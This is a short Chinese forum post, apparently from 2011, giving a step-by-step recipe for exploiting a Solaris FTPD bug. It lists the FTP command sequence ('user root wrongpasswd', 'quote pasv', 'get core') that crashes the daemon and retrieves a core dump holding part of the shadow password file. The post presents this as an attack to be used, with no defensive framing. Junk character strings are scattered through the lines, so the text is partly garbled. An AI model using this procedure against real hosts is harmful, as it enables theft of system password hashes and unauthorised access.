该方法利用了Solaris 操作系统中FTPD的一个BUG,使得用户可以获得该机的口令文件。具体过程如下:
O3 S+ c2 r; e0 m- k* U0 Q0 K
( F& l1 E# X) w% y; V6 [1.通过 ftp 正常登录到目的主机上
8 L. T7 `- L; V$ o/ Q7 W- N7 S6 u- d" L
2.输入如下命令序列:
% G7 D. {9 Z& { ]0 P3 C( h* O' X$ E
ftp> user root wrongpasswd* P& z; y7 J* U: W2 C
& c( \7 s1 {+ lftp> quote pasv
( D4 ^5 t% d6 e% G) E6 {8 b" X9 r; b( z) D$ t5 N- X! |* ~8 s n
3.这时,ftpd会报错退出,同时会在当前目录下生成一个core,口令文件就包含在这个core中。3 Y: ^* [7 @# F4 O2 T( \) o
2 N# k+ X; G0 d
4.再次进入FTP >get core5 V( w" ~! P. i5 A/ V8 j. L8 A
( p( J% ^; f4 N2 Y$ h4 K1 l9 @补充:虽然在core只有一部分shadow,但是对于系统来说已经是致命的打击了
7 B } l; \( M& ~% ~1 X
9 |* P, u6 s$ a& q" d" u \5 a |
|本地广告联系: QQ:905790666 TEL:13176190456|Archiver|手机版|小黑屋|汶上信息港
( 鲁ICP备19052200号-1 )
发表于 2011-1-12 21:01:38
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
显身卡